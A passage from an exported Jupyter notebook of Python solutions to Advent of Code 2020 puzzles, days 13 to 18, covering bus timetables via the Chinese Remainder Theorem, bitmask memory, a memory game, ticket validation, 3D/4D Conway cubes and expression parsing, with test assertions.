return modinv(g, p) #, -w, p
with open('./in/day13.in') as f:
lines = [x.strip() for x in f]
arrival = int(lines[0])
buses = [(i, int(e)) for i, e in enumerate(lines[1].split(",")) if e.isdigit()]
times = [t for _, t in buses]
b = [e - (arrival % e) for e in times]
res = np.min(b) * times[np.argmin(b)]
print("Day 13 a solution:", res)
# Python-3.7 ERROR: pow() 2nd argument cannot be negative when 3rd argument specified
def crt(ns, bs):
"""Solve: Chinese Remainder "problem" using Chinese Remainder Theorem."""
# Chinese Remainder Theorem
# https://brilliant.org/wiki/chinese-remainder-theorem/
#N = prod(ns)
N = np.prod(ns).item()
#x = sum(b * (N // n) * pow(N // n, -1, n) for b, n in zip(bs, ns))
x = sum(b * (N // n) * pow38(N // n, -1, n) for b, n in zip(bs, ns))
return x % N
offsets = [time-idx for idx, time in buses]
res = crt(times, offsets)
print(f"Day 13 b solution: {res:,} <-- {res}")
# In[ ]:
# cool solution from user Rtchaik; this is my preferred!:
# at: [- 2020 Day 13 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/kc4njx/2020_day_13_solutions/)
from itertools import count
def solve_day13_part2(buses):
log.info(f"[solve_day13_part2] {buses}")
start_idx, steps = 0, 1
log.info(f" initial startid={start_idx}, steps-delta={steps}")
for bus, offset in sorted(buses.items(), reverse=True):
for tstamp in count(start_idx, steps):
if not (tstamp + offset) % bus:
start_idx = tstamp
steps *= bus
log.info(f" new startid={start_idx}, steps-delta={steps}, tstamp={tstamp}")
break
log.info(f"found-OK: {tstamp}")
return tstamp
def prepare_buses(s):
buses = {}
for idx, val in enumerate(s.split(',')):
if val == 'x':
continue
val = int(val)
buses[val] = idx
return buses
# In[ ]:
test = "1789,37,47,1889"
assert( 1202161486 == solve_day13_part2(prepare_buses(test)) )
# In[ ]:
#ins = aoc.read_file_to_list('./in/day13.in')
res = solve_day13_part2(prepare_buses(ins[1]))
log.info(f"Day 13 b solution: {res:,} <-- {res}")
# ### Day 14: Docking Data
# In[ ]:
def solve_day14_a(los):
log.info(f"[solve_day14_a] #-instructions={len(los)}")
addrs = {}
for line in los:
if line.startswith('mask'):
mask = line.split(' ')[-1]
mask_or = mask.replace('0','X').replace('X','0')
mask_and = mask.replace('1','X').replace('X','1')
num_or = int(mask_or, 2)
num_and = int(mask_and, 2)
log.debug(f"mask={mask}")
log.trace(f" mask_or ={mask_or }; num_or ={num_or}")
log.trace(f" mask_and={mask_and}; num_and={num_and}")
else:
addr, val = mapl(int, filterl(lambda it: it != '', re.split(r'[^\d]', line)))
new_val = (val | num_or) & num_and
addrs[addr] = new_val
log.debug(f"instruct={[addr, val]} new_val={new_val}")
res = sum(addrs.values())
log.info(f"[solve_day14_a] value-sum={res} from num-addrs={len(addrs.keys())} addrs[#1-#3]={list(addrs.items())[0:3]}")
return res
# In[ ]:
tests = """
mask = XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X
mem[8] = 11
mem[7] = 101
mem[8] = 0
""".strip().split("\n")
#log.setLevel(logging.DEBUG)
solve_day14_a(tests)
# In[ ]:
log.setLevel(logging.INFO)
ins = aoc.read_file_to_list('./in/day14.in')
solve_day14_a(ins)
# In[ ]:
print("Day 14 b")
# In[ ]:
import itertools
# this function by reddit User semicolonator
# @ [adventofcode2020/main.py at master · r0f1/adventofcode2020](https://github.com/r0f1/adventofcode2020/blob/master/day14/main.py)
def get_possible_addrs(mask, addr):
mask2 = "".join(v if m == "0" else m for m, v in zip(mask, f"{addr:036b}"))
res = []
for t in itertools.product("01", repeat=mask2.count("X")):
it = iter(t)
res.append(int("".join(next(it) if c == "X" else c for c in mask2), 2))
return res
# In[ ]:
def solve_day14_b(los):
log.info(f"[solve_day14_b] #-instructions={len(los)}")
addrs = {}
for line in los:
if line.startswith('mask'):
mask = line.split(' ')[-1]
mask_float = mask.replace('1','0')
mask_or = mask.replace('X','0') #mask.replace('0','X').replace('X','0')
num_or = int(mask_or, 2)
log.debug(f"mask={mask}")
log.trace(f" mask_float={mask_float}")
log.trace(f" mask_or ={mask_or }; num_or ={num_or}")
else:
new_addrs = {}
addr, val = mapl(int, filterl(lambda it: it != '', re.split(r'[^\d]', line)))
#new_val = (val | num_or) & num_and
# NOP?: If the bitmask bit is 0, the corresponding memory address bit is unchanged.
# OR!: If the bitmask bit is 1, the corresponding memory address bit is overwritten with 1.
new_addr = addr | num_or
log.trace(f" addr={ addr:>8b} ; := { addr}")
#log.trace(f" num_or={num_or:>8b} ; := {num_or}")
##log.trace(f" addr-ORd={new_addr:>8b}")
log.trace(f" new-addr={new_addr:>8b} ; := {new_addr}")
for addr2 in get_possible_addrs(mask, addr):
addrs[addr2] = val
res = sum(addrs.values())
log.info(f"[solve_day14_b] value-sum={res} from addrs-#={len(addrs.keys())} addrs[#1-#3]={list(addrs.items())[0:3]}")
log.trace(f" {addrs}")
return res
# In[ ]:
tests = """
mask = 000000000000000000000000000000X1001X
mem[42] = 100
mask = 00000000000000000000000000000000X0XX
mem[26] = 1
""".strip().split("\n")
#log.setLevel(aoc.LOGLEVEL_TRACE) # logging.DEBUG
log.setLevel(logging.INFO)
solve_day14_b(tests)
# In[ ]:
solve_day14_b(ins)
# ### Day 15: Rambunctious Recitation
# In[ ]:
def solve15a(l, steps=10):
log.debug(f"[solve15a(l)] called with l={l}")
seen = {}
last_spoken = None
for idx, n in enumerate(l):
last_spoken = n
if n in seen:
seen[n].append(idx+1)
else:
seen[n] = [idx+1]
log.debug(f"idx#{idx+1}, n={n}, * seen[n]={seen[n]}")
#log.trace(f" seen={seen}")
for idx in range(idx+2, steps+len(l)-idx):
#log.debug(f"idx#{idx}, last_spoken={last_spoken}, seen-len={len(seen)}")
#log.trace(f" seen={seen}")
if len(seen[last_spoken])==1:
n = 0
else:
n = seen[last_spoken][-1] - seen[last_spoken][-2]
if n in seen:
seen[n].append(idx)
else:
seen[n] = [idx]
log.trace(f" new n={n}; seen={seen}")
log.debug(f"idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
last_spoken = n
log.info(f"[solve15a] idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
return n
# In[ ]:
tests = "0,3,6"
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.DEBUG)
log.setLevel(logging.INFO)
res = solve15a(mapl(int, tests.split(',')), steps=10)
# 0*, 3*, 6*, 0, 3, 3, 1, 0, 4, 0
log.info(f"testing result={0}")
# In[ ]:
res = solve15a([1, 3, 2], steps=2020)
assert( 1 == res )
res = solve15a([2, 1, 3], steps=2020)
assert( 10 == res )
res = solve15a([1, 2, 3], steps=2020)
assert( 27 == res )
res = solve15a([2, 3, 1], steps=2020)
assert( 78 == res )
res = solve15a([3, 2, 1], steps=2020)
assert( 438 == res )
res = solve15a([3, 1, 2], steps=2020)
assert( 1836 == res )
# In[ ]:
ins = aoc.read_file_to_str('./in/day15.in').strip().split(',')
ins = mapl(int, ins)
res = solve15a(ins, steps=2020)
#log.setLevel(logging.DEBUG)
log.info(f"Day 15 a solution: {res} from {ins}")
# In[ ]:
def solve15b(l, steps=10):
log.info(f"[solve15b(l)] called with list-len={len(l)}, steps={steps:,}")
seen = {}
last_spoken = None
for idx, n in enumerate(l):
last_spoken = n
if n in seen:
#seen[n].append(idx+1)
seen[n] = [seen[n][-1], idx+1]
else:
seen[n] = [idx+1]
#log.debug(f"idx#{idx+1}, n={n}, * seen[n]={seen[n]}")
seen_lens = {}
for n in seen:
seen_lens[n] = len(seen[n])
for idx in range(idx+2, steps+len(l)-idx):
if idx % 10_000_000 == 0 and idx < steps:
log.info(f" calculating, @ idx={idx:,}")
if seen_lens[last_spoken] == 1: #len(seen[last_spoken]) == 1:
n = 0
else:
n = seen[last_spoken][-1] - seen[last_spoken][-2]
if n in seen:
#seen[n].append(idx)
seen[n] = [seen[n][-1], idx]
seen_lens[n] = 2
else:
seen[n] = [idx]
seen_lens[n] = 1
#log.debug(f"idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
last_spoken = n
log.info(f"[solve15b] idx#{idx:,}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
return n
# In[ ]:
# Part a soltions still valid !
res = solve15b([1, 3, 2], steps=2020)
assert( 1 == res )
res = solve15b([2, 1, 3], steps=2020)
assert( 10 == res )
res = solve15b([1, 2, 3], steps=2020)
assert( 27 == res )
res = solve15b([2, 3, 1], steps=2020)
assert( 78 == res )
res = solve15b([3, 2, 1], steps=2020)
assert( 438 == res )
res = solve15b([3, 1, 2], steps=2020)
assert( 1836 == res )
# In[ ]:
#nsteps = 30000000
nsteps = 30_000_000
def run15b(l, steps, cond):
if cond is not None and not EXEC_RESOURCE_HOGS:
# omit resource intensive tests
return
start_tm = int(time.time())
res = solve15b(l, steps=nsteps)
if cond is not None:
assert( cond == res )
took_tm = int(time.time()) - start_tm
log.info(f"result={res} took {took_tm}s")
# In[ ]:
# Given 0,3,6, the 30000000th number spoken is 175594.
run15b([0, 3, 6], nsteps, 175594)
# In[ ]:
# Given 1,3,2, the 30000000th number spoken is 2578.
run15b([1, 3, 2], nsteps, 2578)
# In[ ]:
# Given 2,1,3, the 30000000th number spoken is 3544142.
run15b([2, 1, 3], nsteps, 3544142)
# In[ ]:
# Given 1,2,3, the 30000000th number spoken is 261214.
run15b([1, 2, 3], nsteps, 261214)
# In[ ]:
# Given 2,3,1, the 30000000th number spoken is 6895259.
run15b([2, 3, 1], nsteps, 6895259)
# In[ ]:
# Given 3,2,1, the 30000000th number spoken is 18.
run15b([3, 2, 1], nsteps, 18)
# In[ ]:
# Given 3,1,2, the 30000000th number spoken is 362.
run15b([3, 1, 2], nsteps, 362)
# In[ ]:
if EXEC_RESOURCE_HOGS:
log.info("Day 15 b solution:")
run15b(ins, nsteps, None)
else:
log.info("Day 15 b solution: [[already solved]] - omitting")
# In[ ]:
### Day 16: Ticket Translation
# In[ ]:
tests = """
class: 1-3 or 5-7
row: 6-11 or 33-44
seat: 13-40 or 45-50
your ticket:
7,1,14
nearby tickets:
7,3,47
40,4,50
55,2,20
38,6,12
""".strip()
# In[ ]:
def parse_day16_input(s):
los = s.split("\n")
md = 'fields'
myticket = []
other_tickets = []
fields = {}
for line in los:
if line == '':
continue
if line == 'your ticket:':
md = 'my_ticket'
continue
elif line == 'nearby tickets:':
md = 'other_tickets'
continue
if md == 'fields':
fld, vals = line.split(':')
avals = mapl(lambda it: it.strip() , vals.split(' or '))
for idx, aval in enumerate(avals):
aval = mapl(int, aval.split('-'))
avals[idx] = aval
fields[fld] = avals
elif md == 'my_ticket' or md == 'other_tickets':
this_ticket = mapl(int, line.split(','))
if md == 'my_ticket':
my_ticket = this_ticket
else:
other_tickets.append(this_ticket)
return {'fields':fields, 'my_ticket':my_ticket, 'other_tickets':other_tickets}
def solve16a(ticket_info):
#log.info(f"ticket_info={ticket_info}")
valid_nums = []
for field in ticket_info['fields'].keys():
for entry in ticket_info['fields'][field]:
min, max = entry
for n in range(min, max+1):
valid_nums.append(n)
valid_nums = sorted(set(valid_nums))
#log.info(f"valid_nums={valid_nums}")
invalid_nums = []
for this_ticket in ticket_info['other_tickets']:
for n in this_ticket:
if not n in valid_nums:
invalid_nums.append(n)
ticket_error_rate = sum(invalid_nums)
log.info(f"ticket_error_rate={ticket_error_rate} invalid_nums={invalid_nums}")
return ticket_error_rate
# In[ ]:
ticket_info = parse_day16_input(tests)
solve16a(ticket_info)
# In[ ]:
ins = aoc.read_file_to_str('./in/day16.in')
ticket_info = parse_day16_input(ins)
solve16a(ticket_info)
# In[ ]:
print("Day 16 b")
tests2 = """
class: 0-1 or 4-19
row: 0-5 or 8-19
seat: 0-13 or 16-19
your ticket:
11,12,13
nearby tickets:
3,9,18
15,1,5
5,14,9
""".strip()
# In[ ]:
def solve16b(ticket_info):
#log.info(f"ticket_info={ticket_info}")
fields = ticket_info['fields']
my_ticket = ticket_info['my_ticket']
other_tickets = ticket_info['other_tickets']
all_tickets = other_tickets.copy()
all_tickets.append(my_ticket)
log.info(f"[solve16b] start all_tickets_len={len(all_tickets)}")
all_valid_nums = []
valid_nums = {}
for field in fields.keys():
valid_nums[field] = []
for entry in fields[field]:
min, max = entry
for n in range(min, max+1):
valid_nums[field].append(n)
all_valid_nums.append(n)
for field in valid_nums.keys():
valid_nums[field] = sorted(set(valid_nums[field]))
all_valid_nums = sorted(set(all_valid_nums))
log.trace(f"valid_nums={valid_nums}")
invalid_tickets = []
for this_ticket in all_tickets:
for n in this_ticket:
if not n in all_valid_nums:
invalid_tickets.append(this_ticket)
break
for this_ticket in invalid_tickets:
log.debug(f"removing invalid ticket {this_ticket}")
other_tickets.remove(this_ticket)
all_tickets.remove(this_ticket)
log.info(f"[solve16b] weedd all_tickets_len={len(all_tickets)}")
num_fields = len(ticket_info['fields'])
log.info(f"[solve16b] num_fields={num_fields}")
assert( len(my_ticket) == num_fields)
idx_maybe_field = {}
for idx in range(num_fields):
idx_maybe_field[idx] = []
ticket_nums_at_idx = mapl(lambda it: it[idx], all_tickets)
for field in fields:
if set(ticket_nums_at_idx).issubset(set(valid_nums[field])):
log.debug(f"idx={idx} field={field} OK for values={ticket_nums_at_idx}")
idx_maybe_field[idx].append(field)
idx_map = {}
for i in range(1, 1001):
lens = mapl(lambda it: len(it[1]), idx_maybe_field.items()) # index-order is implcit
log.trace(lens)
found_this_loop = []
for idx, l in enumerate(lens):
if l == 0:
continue
#if not idx in idx_maybe_field.keys(): # already found
# continue
if l == 1:
fieldnm = idx_maybe_field[idx][0]
found_this_loop.append(fieldnm)
idx_map[fieldnm] = idx
idx_maybe_field[idx] = []
log.debug(f"loop {i} idx_map={idx_map}")
for f in found_this_loop:
for k in idx_maybe_field.keys():
if f in idx_maybe_field[k]:
idx_maybe_field[k].remove(f)
if len(idx_map.keys()) >= num_fields:
break
if i >= 1000:
raise Exception("FAILSAFE")
return idx_map
# In[ ]:
ticket_info = parse_day16_input(tests)
solve16b(ticket_info)
# In[ ]:
ticket_info = parse_day16_input(tests2)
solve16b(ticket_info)
# In[ ]:
ticket_info = parse_day16_input(ins)
idx_map = solve16b(ticket_info)
my_ticket = ticket_info['my_ticket']
f = 1
for k,v in idx_map.items():
if k.startswith('departure'):
log.info(f"field-idx={[k, v]} myticket-val={my_ticket[v]}")
f *= my_ticket[v]
log.info(f"Day 16 b solution: {f}") # not 930240
# ### Day 17: Conway Cubes
# In[ ]:
tests = """
.#.
..#
###
""".strip()
tests = mapl(list, tests.split("\n"))
log.info(tests)
# In[ ]:
# solution TODO
# In[ ]:
class Grid3d:
"""Grid of 3d-cells, discrete 3d space, each cell represents a cube."""
def __init__(self):
log.debug("[Grid3d] constructor.")
def initialize(self, pattern):
self.pattern0 = pattern
self.points = []
z = 0
for y in range(len(pattern)):
for x in range(len(pattern[0])):
if pattern[y][x] == '#':
self.points.append( (x, y, z) )
def report(self):
return f"#pts={len(self.points)} {self.points}"
def get_layer(self, z):
return filterl(lambda it: z == it[2], self.points)
def get_zrange(self):
zs = mapl(lambda it: it[2], self.points)
return range(min(zs), max(zs)-min(zs)+1)
def get_layer_repr(self, z):
xs = mapl(lambda it: it[0], self.points)
ys = mapl(lambda it: it[1], self.points)
extent2d = [[min(xs), max(xs)], [min(ys), max(ys)]]
dim_x, dim_y = [ max(xs) - min(xs) + 1, max(ys) - min(ys) + 1 ]
x_ofst = -min(xs)
y_ofst = -min(ys)
rows = []
for y in range(0, max(ys)+y_ofst+1):
s = ''
for x in range(0, max(xs)+x_ofst+1):
if (x-x_ofst, y-y_ofst, z) in self.points:
s += '#'
else:
s += '.'
rows.append(s)
return f"grid-lvl@z={z} dims={[dim_x, dim_y]} extents={self.get_extents()} x-ofst={-x_ofst} y-ofst={-y_ofst}\n" +str.join("\n", rows)
def get_num_neighbors(self, pt):
xp, yp, zp = pt
num_neighbors = 0
for z in range(zp-1, zp+2):
for y in range(yp-1, yp+2):
for x in range(xp-1, xp+2):
if (x, y, z) == pt: # identity, given point itself
continue
if (x, y, z) in self.points:
num_neighbors += 1
return num_neighbors
def get_extents(self):
xs = mapl(lambda it: it[0], self.points)
ys = mapl(lambda it: it[1], self.points)
zs = mapl(lambda it: it[2], self.points)
return [[min(xs), max(xs)], [min(ys), max(ys)], [min(zs), max(zs)]]
class ConwayCubeGrid(Grid3d):
"""Conway cellular automaton in 3d, inheriting from class Grid3d."""
def __init__(self):
log.debug("[ConwayCubeGrid] constructor.")
self.t = 0
def iterate(self, steps=1):
for i in range(steps):
exts = self.get_extents()
new_pts = copy.deepcopy(self.points)
for x in range(exts[0][0]-1, exts[0][1]+2):
for y in range(exts[1][0]-1, exts[1][1]+2):
#if x == 0:
# log.trace(f"iter-row {y}")
for z in range(exts[2][0]-1, exts[2][1]+2):
pt = (x, y, z)
is_active = pt in self.points
#if is_active:
# log.info(f"iterate: pt={pt} was active")
nn = self.get_num_neighbors(pt)
if is_active:
if not (nn in [2, 3]):
#log.trace(f"iter-remove {pt}")
new_pts.remove( pt )
else:
if nn == 3:
#log.trace(f"iter-append {pt}")
new_pts.append( pt )
self.points = new_pts
self.t += 1
# In[ ]:
grid = Grid3d()
log.info(f"grid={grid}")
grid.initialize(tests)
log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0) )
grid.get_extents()
# In[ ]:
grid = ConwayCubeGrid()
log.info(f"grid={grid}")
grid.initialize(tests)
#log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0) )
grid.get_extents()
log.info(f"grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
log.info(grid.get_layer_repr(0))
#res = grid.get_layer(0)
for i in range(1, 7):
grid.iterate()
log.info(f"Iterated: grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
for z in grid.get_zrange():
##log.info(f"grid @ t={grid.t} pts@z=0 {res}")
#log.info(grid.get_layer_repr(z))
True
# In[ ]:
grid = ConwayCubeGrid()
grid.initialize(tests)
grid.iterate(steps=6)
assert( 6 == grid.t )
assert( 112 == len(grid.points) )
# In[ ]:
ins = aoc.read_file_to_str('in/day17.in').strip()
log.info(f"pattern=\n{ins}")
ins = mapl(list, ins.split("\n"))
grid = ConwayCubeGrid()
grid.initialize(ins)
grid.iterate(steps=6)
assert( 6 == grid.t )
res = len(grid.points)
log.info(f"Day 18 a solution: num points after 6 iterations: {res}")
# In[ ]:
class Grid4d:
"""Grid of 4d-cells, each cell represents a 4d-cube, a hypercube, a tesseract."""
def __init__(self):
log.debug("[Grid4d] constructor.")
def initialize(self, pattern):
self.pattern0 = pattern
self.points = []
z, w = 0, 0
for y in range(len(pattern)):
for x in range(len(pattern[0])):
if pattern[y][x] == '#':
self.points.append( (x, y, z, w) )
def report(self):
return f"#pts={len(self.points)} {self.points}"
def get_layer(self, z, w):
return filterl(lambda it: z == it[2] and w == it[3], self.points)
def get_zrange(self):
zs = mapl(lambda it: it[2], self.points)
return range(min(zs), max(zs)+1)
def get_wrange(self):
ws = mapl(lambda it: it[3], self.points)
return range(min(ws), max(ws)+1)
def get_layer_repr(self, z, w):
xs = mapl(lambda it: it[0], self.points)
ys = mapl(lambda it: it[1], self.points)
extent2d = [[min(xs), max(xs)], [min(ys), max(ys)]]
dim_x, dim_y = [ max(xs) - min(xs) + 1, max(ys) - min(ys) + 1 ]
x_ofst = -min(xs)
y_ofst = -min(ys)
rows = []
for y in range(0, max(ys)+y_ofst+1):
s = ''
for x in range(0, max(xs)+x_ofst+1):
if (x-x_ofst, y-y_ofst, z, w) in self.points:
s += '#'
else:
s += '.'
rows.append(s)
return f"grid-lvl@[z,w]={[z,w]} dims={[dim_x, dim_y]} extents={self.get_extents()}" + f"x-ofst={-x_ofst} y-ofst={-y_ofst}\n" +str.join("\n", rows)
def get_num_neighbors(self, pt):
xp, yp, zp, wp = pt
num_neighbors = 0
for w in range(wp-1, wp+2):
for z in range(zp-1, zp+2):
for y in range(yp-1, yp+2):
for x in range(xp-1, xp+2):
if (x, y, z, w) == pt: # identity, given point itself
continue
if (x, y, z, w) in self.points:
num_neighbors += 1
return num_neighbors
def get_extents(self):
xs = mapl(lambda it: it[0], self.points)
ys = mapl(lambda it: it[1], self.points)
zs = mapl(lambda it: it[2], self.points)
ws = mapl(lambda it: it[3], self.points)
return [[min(xs), max(xs)], [min(ys), max(ys)], [min(zs), max(zs)], [min(ws), max(ws)]]
class ConwayTesseractGrid(Grid4d):
"""Conway cellular automaton in 4d, inheriting from class Grid4d."""
def __init__(self):
log.debug("[ConwayTesseractGrid] constructor.")
self.t = 0
def iterate(self, steps=1):
for i in range(steps):
exts = self.get_extents()
new_pts = copy.deepcopy(self.points)
for x in range(exts[0][0]-1, exts[0][1]+2):
for y in range(exts[1][0]-1, exts[1][1]+2):
#if x == 0:
# log.trace(f"iter-row {y}")
for w in range(exts[3][0]-1, exts[3][1]+2):
for z in range(exts[2][0]-1, exts[2][1]+2):
pt = (x, y, z, w)
is_active = pt in self.points
#if is_active:
# log.info(f"iterate: pt={pt} was active")
nn = self.get_num_neighbors(pt)
if is_active:
if not (nn in [2, 3]):
#log.trace(f"iter-remove {pt}")
new_pts.remove( pt )
else:
if nn == 3:
#log.trace(f"iter-append {pt}")
new_pts.append( pt )
self.points = new_pts
self.t += 1
# In[ ]:
grid = ConwayTesseractGrid()
log.info(f"grid={grid}")
grid.initialize(tests)
#log.info(f"grid rpt:\n{grid.report()}")
assert 1 == grid.get_num_neighbors( (0,0,0,0) )
assert 2 == grid.get_num_neighbors( (2,0,0,0) )
assert 5 == grid.get_num_neighbors( (1,1,0,0) )
assert 0 == grid.get_num_neighbors( (-2,-1,0,0) )
grid.get_extents()
log.info(f"grid @ t={grid.t} extents={grid.get_extents()} numpts={len(grid.points)}")
log.info(grid.get_layer_repr(0, 0))
#res = grid.get_layer(0)
grid.iterate()
log.info(grid.get_layer_repr(-1, -1))
log.info(grid.get_layer_repr(0, 0))
log.info(grid.get_layer_repr(1, 1))
grid.iterate()
log.info(grid.get_layer_repr(-2, -2))
log.info(grid.get_layer_repr(0, 0))
log.info(grid.get_layer_repr(2, 0))
grid.iterate(steps=4)
assert( 6 == grid.t )
assert( 848 == len(grid.points) )
# In[ ]:
if EXEC_RESOURCE_HOGS: # took 226 seconds on my notebook
grid = ConwayTesseractGrid()
grid.initialize(ins)
start_tm = int(time.time())
for i in range(1, 7):
grid.iterate(steps=1)
npts = len(grid.points)
took_tm = int(time.time()) - start_tm
log.info(f"after grid iteration {i}: num-points={npts:,} after {took_tm}s")
assert( 6 == grid.t )
res = len(grid.points)
log.info(f"Day 18 b solution: num points after 6 iterations: {res}")
# ### Day 18: : Operation Order
# In[ ]:
# This definitely is/would be LISP territory !
# In[ ]:
def parse_equation18a(s):
"""Parse / tokenize a single "equation"."""
l = re.split(r'(?=[\+\-\*\/\(\)])|(?<=[\+\-\*\/\(\)])', s)
l = filterl(lambda it: it != '', mapl(lambda it: it.strip(), l))
l = mapl(lambda it: int(it) if not (it in ['+','-','*','/','(',')']) else it, l)
log.debug(f"[parse_equation18a] returns={l}")
return l
def rindex_list(elem, l):
"""Return the index of the rightmost element in list."""
return len(l) - list(reversed(l)).index(elem) - 1
def find_matching_close_paren_idx(lst):
"""Assumes input list starting with '(', finds matching ')' and returns it's index.
If not found, returns -1."""
tgtcount = 0
tgtidx = -1
for idx in range(len(lst)):
if lst[idx] == ')':
tgtcount -= 1
elif lst[idx] == '(':
tgtcount += 1
if tgtcount < 1:
tgtidx = idx
break
return tgtidx
def calc18a(l):
log.debug(f"[calc18a] l={l}")
rest = l
ict = 0
while( len(rest)>1 ):
ict += 1
lval, rest = [rest[0], rest[1:]]
log.trace(f" in [lval, rest]={[lval, rest]} rest-len={len(rest)}")
if lval == '(':
rest = [lval] + rest # re-assemble
ridx = find_matching_close_paren_idx(rest)
sublst = rest[1:ridx] # last/rightmost index of closing parens
new_rest = rest[ridx+1:]
log.trace(f"calcparen lval={lval} sublst={sublst} new-rest={new_rest} from={rest}")
lval = calc18a(sublst.copy())
rest = [lval] + new_rest
else:
op, rest = [rest[0], rest[1:]]
rval = rest[0]
log.trace(f" op-mode {[op, rest]} lval={lval} op={op} rval={rval} all-rest={rest}")
if rval == '(':
idx = find_matching_close_paren_idx(rest)
sublst = rest[1:idx]
new_rest = rest[idx+1:]
log.trace(f"calcparen (lval={lval}) rval sublst={sublst} new-rest={new_rest} from {rest}")
rval = calc18a(sublst.copy())
rest = [op] + new_rest
log.trace(f" calcparen rval={rval} sublst={sublst} new-rest={new_rest} from {rest}")
if op == '+':
lval += rval
rest = [lval] + rest[1:]
elif op == '*':
lval *= rval
rest = [lval] + rest[1:]
else:
raise Exception(f"unhandled operator {op}")
log.trace(f" loop-end: lval={lval}; new-list={rest}")
if len(rest)>1 and rest[1] == ')': # found result of parns in val
log.debug(" next is ')' group closing, break")
break
log.debug(f" returning val={lval}; from={l}")
return lval
# In[ ]:
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.INFO)
test = """
1 + 2 * 3 + 4 * 5 + 6
""".strip()
testlst = parse_equation18a(test)
res = calc18a(testlst)
print("test result", res)
# In[ ]:
test = """
1 + (2 * 3) + (4 * (5 + 6))
""".strip()
assert( 51 == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
2 * 3 + (4 * 5)
""".strip()
res = calc18a(parse_equation18a(test))
assert( 26 == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
5 + (8 * 3 + 9 + 3 * 4 * 3)
""".strip()
expectd = 437
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))
""".strip()
expectd = 12240
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
(1 + 2)
""".strip()
expectd = 3
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
test = """
((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2
""".strip()
expectd = 13632
assert( expectd == calc18a(parse_equation18a(test)))
# In[ ]:
ins = aoc.read_file_to_list('./in/day18.in')
csum = 0
for eqstr in ins:
csum += calc18a(parse_equation18a(eqstr))
log.info(f"Day 18 a solution: equations cumsum={csum}")
# In[ ]:
print("Day 18 b")
def calc18b(l):
log.debug(f"[calc18b] l={l}")
rest = l
ict = 0
while( len(rest)>1 ):
ict += 1
lval, rest = [rest[0], rest[1:]]
log.trace(f" >in [lval, rest]={[lval, rest]} rest-len={len(rest)}")
if lval == '(':
rest = [lval] + rest # re-assemble
ridx = find_matching_close_paren_idx(rest)
sublst = rest[1:ridx] # last/rightmost index of closing parens
new_rest = rest[ridx+1:]
log.trace(f"calcparen lval={lval} sublst={sublst} new-rest={new_rest} from={rest}")
lval = calc18b(sublst.copy())
rest = [lval] + new_rest
log.trace(f" cprv new-rest={rest}")
else:
op, rest = [rest[0], rest[1:]]
rval = rest[0]
log.trace(f" op-mode {[op, rest]} lval={lval} op={op} rval={rval} all-rest={rest}")
if rval == '(':
idx = find_matching_close_paren_idx(rest)
sublst = rest[1:idx]
new_rest = rest[idx+1:]
log.trace(f"calcparen (lval={lval}) rval sublst={sublst} new-rest={new_rest} from {rest}")
rval = calc18b(sublst.copy())
rest = [rval] + new_rest
log.trace(f" calcparen rval={rval} sublst={sublst} new-rest={new_rest} from {rest}")
if op == '+':
lval += rval
rest = [lval] + rest[1:]
log.debug(f" (+)=> rval={rval}, lval={lval}, new rest={rest}")
elif op == '*':
# postpone multiplication ! Rather, recurse fun-call for r-value
log.debug(f" PROD in [lval, op, rest]={[lval, op, rest]} rest-len={len(rest)}")
if len(rest) > 1:
rval = calc18b(rest.copy())
lval *= rval
rest = []
log.debug(f" (*)=> rval={rval}, lval={lval}, new rest={rest}")
else:
raise Exception(f"unhandled operator {op}")
log.trace(f" loop-end: lval={lval}; new-list={rest}")
if len(rest)>1 and rest[1] == ')': # found result of parens in val
log.debug(" next is ')' group closing, break")
break
log.debug(f"[calc18b] RC={lval} from {l}")
return lval
# In[ ]:
test = """
1 + 2 * 3 + 4 * 5 + 6
""".strip()
testlst = parse_equation18a(test)
res = calc18b(testlst)
print("test result", res)
# In[ ]:
test = """
1 + (2 * 3) + (4 * (5 + 6))
""".strip()
expectd = 51
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
2 * 3 + (4 * 5)
""".strip()
expectd = 46
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
5 + (8 * 3 + 9 + 3 * 4 * 3)
""".strip()
expectd = 1445
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))
""".strip()
expectd = 669060
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
test = """
((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2
""".strip()
expectd = 23340
res = calc18b(parse_equation18a(test))
assert( expectd == res)
log.info(f"test result={res}")
# In[ ]:
ins = aoc.read_file_to_list('./in/day18.in')
csum = 0
for eqstr in ins:
csum += calc18b(parse_equation18a(eqstr))
log.info(f"Day 18 b solution: equations cumsum={csum}")
# ### Day 19: Monster Messages
#
